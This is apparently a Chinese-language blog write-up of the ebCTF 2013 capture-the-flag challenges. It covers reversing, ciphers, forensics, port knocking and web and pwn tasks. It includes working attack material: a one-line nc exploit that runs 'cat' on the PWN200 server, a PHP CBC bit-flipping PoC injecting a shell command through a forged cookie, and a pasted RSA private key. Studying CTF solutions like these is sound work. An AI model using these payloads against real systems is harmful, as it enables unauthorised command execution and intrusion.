ebCTF 2013 Writeup

拖超久的 writeup ,感謝一起玩的 217 大大們,下面整理了一些大大們的解法,和從各處搜括來的 writeup

BIN100

擲骰子要丟出指定的順序,不過最後一個是 7 ,所以 patch 一下判斷數字的 je/jne 就可以了。

Reference

BIN200

Reference

BIN300

$ gdb
(gdb) file moon
(gdb) b luaL_loadbuffer
Breakpoint 1 at 0x411110
(gdb) r
Breakpoint 1, 0x0000000000411110 in luaL_loadbuffer ()
(gdb) x/3s $rsi
0x627340 <content.2593>:    "p = 54111037\ng = 56321\n\nio.write(\"Enter your password: \")\nio.flush()\npassword=io.read()\nif string.len(password) ~= 32 then\n    print(\"Wrong!\")\n    return 0\nend\n\nv = g\nalpha = \"0123456789abcdef\"\nfor lo"...
0x627408 <content.2593+200>:    "op =1,32 do\n    v = v * g\n    v = v % p\n    r = v % 16\n    good = string.sub(alpha,r+1,r+1)\n    if good ~= string.sub(password,loop,loop) then\n        print(\"Wrong!\")\n        return 0\n    end\nend\nprin"...
0x6274d0 <content.2593+400>:    "t(\"Well done, the flag is: ebCTF{\"..password..\"}\")\n-- f02233aca4839124ee6ffa766883c47e\n"

Reference

BIN400

題目是要生出 5 個 MD5 一樣的 console executable PE32 ,分別會印出:

所以做 md5 collision ,原本檔案的內容是對自己做簡單的 hash 再從 hash 決定要印哪一句:

// by seanwu
##include <stdio.h>
const char* str[5]= {
    "All Eindbazen are wearing wooden shoes",
    "All Eindbazen live in a windmill",
    "All Eindbazen grow their own tulips",
    "All Eindbazen smoke weed all day",
    "All Eindbazen are cheap bastards"
};
int main(int argc,char **argv){
    FILE* f=fopen(argv[0],"rb");
    fseek(f,-20005,SEEK_END);
    int x=0;
    unsigned char z;
    for( int i=0; i<20000; i++ ){
        fread(&z,1,1,f);
        x=(x*33331+z)%5;
    }
    x=(x+5)%5;
    puts(str[x]);
    return 0;
}

Reference

CRY100

$ echo 'KZUJJUN06TR3T2T6ABTEAB163A3NREE1JZ6N3QFLIYHMP X7V6C6TUK53TZ653N2UNRB316WE11VZ3UV3AKKZUJJ3RV 6D6SZ6J32S11D353TDVZUN0UK68U2N6V23312T33V646N VE4VA36NJZ6N3NSAB3TQFLIYHMPX78UNRT30ETRKBTEAF QQ8U16J6VEV63KHQ8U164ES1U216W3TLL8U16EJJ13KFI Y8U1613386N3K346NRJETV62VZ321E0B4F4Q7' | tr -d ' ' | tr KZUJN06TR32ABEQFLIYHMPX7VC54 shipngordefmba0123456789tjvc

shippingorderfrombramb1oemendaa1phone0123456789tojorisverhovenfindbe1oWa11theitemsshippedtoDoShopefS11DeverDthingiso8ifnotfee1freetocontactmeonphonenSmber01234567898indregardsbram1008i1opotatoes508i1ocaS1if1oWer228i1oapp1es1348i1o1ee8onesecondpartofthef1agbc1c09
$ echo 'thhneu hpeitr eafnw frleo otata uoghb rfirf ttseo' | tr ' ' $'\n'

thhneu
hpeitr
eafnw
frleo
otata
uoghb
rfirf
ttseo
$ cat 5.txt | tr "[:lower:]" "[:upper:]" | tr SIWZGDRYUOMKQBTJPNFEHLX aistheflgbuprodywmcknxv

a common mistake made by foreigners is that the netherlands legaliAed the use of cannabis and other recreational soft drugs. according the law any use of drugs is still illegal, but there is a tolerancy policy called gedoogbeleid for any soft drugs. this is a set of guidelines telling public prosecutors under which circumstances offenders should not be prosecuted. according to current gedoogbeleid the possession of a maximum amount of five grams cannabis for personal use is not prosecuted. cultivation is treated in a similar way. cultivation of 5 plants or less is usually not prosecuted when they are renounced by the cultivator.  so if you come to the netherlands and want to try some recreational use of soft drugs, beware that it is not legal. the fifth part for the flag is ab1fde
$ cat 6.txt | tr "[:upper:]" "[:lower:]" | tr abcdefghijklmnopqrstuvwxyz wxyzabcdefghijklmnopqrstuv

the delta works is a series of construction projects in the southwest of the netherlands to protect a large area of land around the rhine-meuse-scheldt delta from the sea. the works consist of dams, sluices, locks, dikes, levees, and storm surge barriers. the aim of the dams, sluices, and storm surge barriers was to shorten the dutch coastline, thus reducing the number of dikes that had to be raised.
along with the zuiderzee works, delta works have been declared one of the seven wonders of the modern world by the american society of civil engineers. the last part of the flag is: one-five-f-three-four-}

CRY200

聽大大說是要去對一堆 n 去做 gcd ,分解出其中一組質數 p, g ,接著再去暴力試出 e, d

Reference

CRY300

Reference

CRY400

FOR100

strings 發現

eindbazen@eindbazen:~$ python2 ctf.py ' i hide my '

感覺就是他了!所以試著 grep ctf.py 沒東西之後,再試了 grep sys.argv 會找到一段 python code

import sys
import time
import random
import signal
from Crypto.Cipher import AES
key1 = "is this where"
key2 = sys.argv[1]
key3 = raw_input("Password: ")
iv = 'a very random iv'
secret = './flag'
mode = AES.MODE_CBC
def encrypt(signum, frame):
    key = key1 + key2 + key3
    enc = AES.new(key, mode, iv)
    inp = raw_input("Enter secret: ")
    diff = len(inp) % 16
    if diff != 0:
    inp += ' ' * (16 - diff)
    with open(secret, 'wb') as outfile:
        outfile.write(enc.encrypt(inp))
    del key, enc
def decrypt(signum, frame):
    key = key1 + key2 + key3
    enc = AES.new(key, mode, iv)
    with open(secret, 'rb') as infile:
        print(enc.decrypt(infile.read(48)))
    del key, enc
signal.signal(signal.SIGUSR1, encrypt)
signal.signal(signal.SIGUSR2, decrypt)
while True:
    time.sleep(1)

接著要找 key3 ,試著 grep 'i hide my' 之後找到一行

is this where i hide my secrets?

拿他當 key 跑 AES decrypt 就拿到 flag 了!

FOR200

Reference

< Guest10733> how did u get sms in for200 ?
<@gijs> Guest10733: the SMS is stored in inbox.txt but in some binary format that is also used to transmit sms over the network
< cr0n> Guest10733: sms pdu: http://www.smartposition.nl/resources/sms_pdu.html

FOR300

Reference

FOR400

NET100

從給的 net-100.pcap 裡可以找到一個有密碼的 rookit.zip ,發現裡面有 flag ,接著就是要找解壓縮密碼了,密碼可以在一連串的 udp packet 中找到!

Reference

NET200

這題一開始只給了 112 + 386 + 712 + 1398 + 8771 + 11982 + 15397 + 23984 = 51037 ,連到網頁看到了 X-Powered-By:*knock knock* ,猜測是要做 port knocking !

$ nc -w 1 54.216.81.14 112;
$ nc -w 1 54.216.81.14 386;
$ nc -w 1 54.216.81.14 712;
$ nc -w 1 54.216.81.14 1398;
$ nc -w 1 54.216.81.14 8771;
$ nc -w 1 54.216.81.14 11982;
$ nc -w 1 54.216.81.14 15397;
$ nc -w 1 54.216.81.14 23984;
$ nc -w 1 54.216.81.14 51037;
So you are knocking me, how about I return the favor?
Repeat after me and I will open the last port…

下一階段的提示是要照著對方敲我們 port 的順序敲回去,我們是利用 iptables 來把進來的 tcp connection 記錄下來:

# iptables -A INPUT -p tcp -j LOG --log-prefix ' INPUT TCP ' --log-level 4

接著會在 /var/log/kern.log 拿到記錄,接著再敲回去:

$ nc -w 1 54.216.81.14 8112;
$ nc -w 1 54.216.81.14 33386;
$ nc -w 1 54.216.81.14 14712;
$ nc -w 1 54.216.81.14 4398;
$ nc -w 1 54.216.81.14 1771;
$ nc -w 1 54.216.81.14 52313;
$ nc -w 1 54.216.81.14 25697;
$ nc -w 1 54.216.81.14 932;
$ nc -w 1 54.216.81.14 22222;
[Advanced]
        sequence    = 234,781,983,2411,9781,14954,23112,63991
        seq_timeout = 15
        command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT
        tcpflags    = fin,urg,!ack
        cmd_timeout = 30
        stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 32154 -j ACCEPT

拿到第三階段的提示了!查了一下發現是 knockd 的設定檔,這次會檢查 tcp flags ,我們是用 (hping)[http://www.hping.org/] 來設 tcp flags

hping3 -c 1 -F -U -p 234   54.216.81.14
hping3 -c 1 -F -U -p 781   54.216.81.14
hping3 -c 1 -F -U -p 983   54.216.81.14
hping3 -c 1 -F -U -p 2411  54.216.81.14
hping3 -c 1 -F -U -p 9781  54.216.81.14
hping3 -c 1 -F -U -p 14954 54.216.81.14
hping3 -c 1 -F -U -p 23112 54.216.81.14
hping3 -c 1 -F -U -p 63991 54.216.81.14

最後再連 port 32154 就會噴 flag 了!

Reference

< ai1> Ghaaf, the final one:

    nmap -vvv -PN --scanflags FINURG 54.216.81.14 -r -p234,781,983,2411,9781,14954,23112,63991 --scan-delay 1

< Tilou> http://pastebin.com/jBr3d9wR <- hping way

    #!/bin/bash
    sequence="234 781 983 2411 9781 14954 23112 63991"
    for port in $sequence; do
        hping -F -U -c 1 -p $port 54.216.81.14 > /dev/null 2>&1
    done
    nc 54.216.81.14 32154

NET300

Reference

NET400

Reference

PWN100

Reference

<@gijs> foundation: pwn100 initial key https://p.6core.net/p/yMz8naU2ZphAAHWjGkY7ICcD

-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA8Ew1BzA3rNBwrFYevJ6mJMVfe+ZMrbrq20Q78MIprjxMmEV8
hUiYq4CftCeNj+XxYYuaYLwAA8GfW+wrS04AAEzHTNwc1wKbHdOzvParhiIFOjJ2
NX/ljlQA7LCO0bToMg971gKrFGYPGMa5vKsx9hXyDCLegXHV3G/duPxaG0hkYucC
UrilqtGMFmpFQu+vgDdudEEVg+01BtNanCxOeYuWLnd8ViZx3qrdooPNnhxh1hop
ciYNp5ORQiYKFFCmIxAMRnXYlZt5CbPIbNrRLHKSnrDyOhSLa0e3tjnGYv+YjrHB
OaWQoPu3dOu88ason5jhbTKzZ2gOe24vlg9hdwIBIwKCAQApMaKwxm/xvVUk25A9
l4oyMHbEyGTqlRJReWlceQ51o+/fluIleijM8Xp2p7HeJ2s1SyHHcK+LnYkIcaEF
mFfFiYFAYD91UOdkMuucvJJuxADlZ7x+My6qr1Cdmpwj8yB9nEEdX4sKz6rRDB/X
M0pks04QtYU6ww64Ey1S6W6IVTh/6TNzPc2mEBtHJd7yDI08aY0fbIOf5z4WNPBE
oEYIu6FWTMDf57XaUPclrPNnCturWcAdzw1DgYiyuDaS4YtryDfyaBA+WbepEOEb
HFkMf6jgDfqpnGc+vL8Z3ggoftOHZPdS3NNScrR1zRZbRyLP6DNRPjmIldThIrdv
fb+LAoGBAPzFhrlH84GwoZs+Hd/YFYgQxySGEqSspp6x14wv+7eseUN8Vp/+A11Z
kZfRHrZU5r5eTIlo+ajXeX8Uu04U5A0X3mFXpfsGksPuEvVPPzCHwHIvfsDl2u/3
ymStMDg2DHbAnyncLYUVVMjAVudL7MDq3fz1T44gfAcj+/jQOgwBAoGBAPNd5UeV
MfRcJ1G5RNDm5kTkXegMNXEH1wF+HFTb3v5Ey9A6tnc+Bhpg66QgSYtwIPdll2oF
9Jdw+8oa4tL785ZrzGSTcNQjUrBsE7H/dkPbyXH+4KXMKUEwME2cz7PrZKU4RZ9P
b+WACdIFaH3mn3H38GPIotWqLK2LfQi7d813AoGAVqofj/tpbkswF/gKPh4zRJgJ
w2Eq9qGYNmjcMBBzj25VdjlCRXupYdWRANn75r4F+CBUwWXR8L7n08yX/YOBY5Mn
rFiQrdZeNIwjwdIHCVMdaPpXWBRLEHI2w26UMIePPqhxFaqTQ5JI9F8zvQQWqIsK
SBmXnnGJnAxWY++e34sCgYB2NOu1DfOxNBMZENhINaMLhN0nkObB3zyLskhGeWxP
ncIUrs2nochzNmPTYCO4wW8ZFBZYEYVuIO9TiWbbgbDUCHk4KltfuWKtdlK1irXJ
MD1F/3RtyZBhfc5RlU7w/U4kXSkhflrr0HnMaQbeEO5b7XTCwIma+uKALc8EPcx5
vQKBgBCqEbKrfUF5H1QQunHiIsRE40zJ8MaGZbdT7ZC/bXTcwFnC+m3Ql/Iko3KU
qJ59EAryB5SmrpViNlhl3JL+Pu2m4fNhvxVfBdNSxuJMjodK6n2O4WeF0NUS0bpZ
EZRema+mBXD/lSTh1d9FnEOwrbFFEnuTZfAnEvEFo1m/Qn43
-----END RSA PRIVATE KEY-----

PWN200

$ perl -e 'print ">"x51 . "-"x47 . "\ncat IM_A_FLAG\n"' | nc 176.34.95.148 31313

PWN300

Reference

< gna_> pwn300 writeup
< gna_> http://pastebin.com/G0KvW6t6
< bata_> pwn300 http://pastebin.com/gc8u6J3M

PWN400

Reference

WEB100

Reference

<@gijs> loveldyream: this is what i developed when i tested it
        https://p.6core.net/p/0lAkDRAsvPqj1zeMVz6A5xcl> using blind
        injection but i know the author has a one-liner which will
        return the value directly without using blind injection

WEB200

Reference

WEB300

Reference

< daniel1024> xpath injection in web100?
< daniel1024> *300
<@gijs> daniel1024: yes xpath injection
< RlIxOTA4> web300 was xpat
< RlIxOTA4> h

WEB400

這題很有趣!雖然我們沒有解出來 XD

一開始要利用 function hmac($data) 裡的 typo 讓我們可以假造合法的 cookie , 接著再利用 AES CBC mode 解密時會和前一個 block 做 xor 的特性, 只要知道某一段 plaintext 是什麼,就可以在 ciphertext 中 xor 前一個 block , 讓解出來的 plaintext 變成我們想要的(超抽象 XD )

沒有寫完整 writeup ,有興趣的人可以看下面的 reference 研究一下 PoC !

Reference

< phiber_> web400 solution http://privatepaste.com/1d0f3254f6

<?php
$a = base64_decode(urldecode('%2FW8w%2BUpwN%2B2vh85b54XcyGM2wSNNFFcBqoGr%2BX5S7FOuJn%2FJBJwp1R1F5VpqsR9NkW82Ut8L5hPFKa%2BWIEs2W9DP9Qnq9zhmAJ5FwbNcY6viYT2kZd1Yz06lplcsnRuaFU8gj5TV9jHX8wps2%2BTaAO68TrHgF3Scvt56BrGAlZX%2Fp24qGKQf5m%2B15RdsgC6M%2BQ9Fl7KhwazU1F9yJ9rx7GH5HsCC4ztYeVVoiFYQQIDMPMHZkIeA7sbYrhH6L9Ej8DlEb2dErkHBVP98Wp5aAxm8jIXeqgBHfPF8s26o%2Bjs2T6XfWm3cv%2FN4yp93yGEpSja7dAr1Bdw3k1TVVPAqzGFBA2SbB6skHQhNiC5hfJ4TdymBfzzt8QLvGT3KKBlQP1sgNcLIpwhFCOGlGkN1Nq7%2Bb2GV5h%2FtyLH%2FTW2LGuVcBCTRXFY7mC0IPV2WCFSTyOddnX5t2sNeU9zBop9WeWQe199f50%2FRKRX4aA%2FLsSrGqv%2F2s4z96n9I0Zu4oGcpb9hGh3zvzGZQy6J4TAeKRKCRsIW3vDFacngSGcUAklS4nsRqXJBVEZ70WcBFQjVI7zMX8cjJS8RiyQLKgGpKirYotsetFk98xonYzbwBnyNLiNFEM0WSsPoDSW2UvQe3NfDEJKwT63l9uaAHTbfWXQ%3D%3D'));
$blocks = str_split($a, 16);
$blocks[22] = $blocks[22] ^ str_repeat('a', 16) ^ "';cat *; echo 'a";
$b = implode('', $blocks);
echo urlencode(base64_encode($b))."\n";
?>
Support Me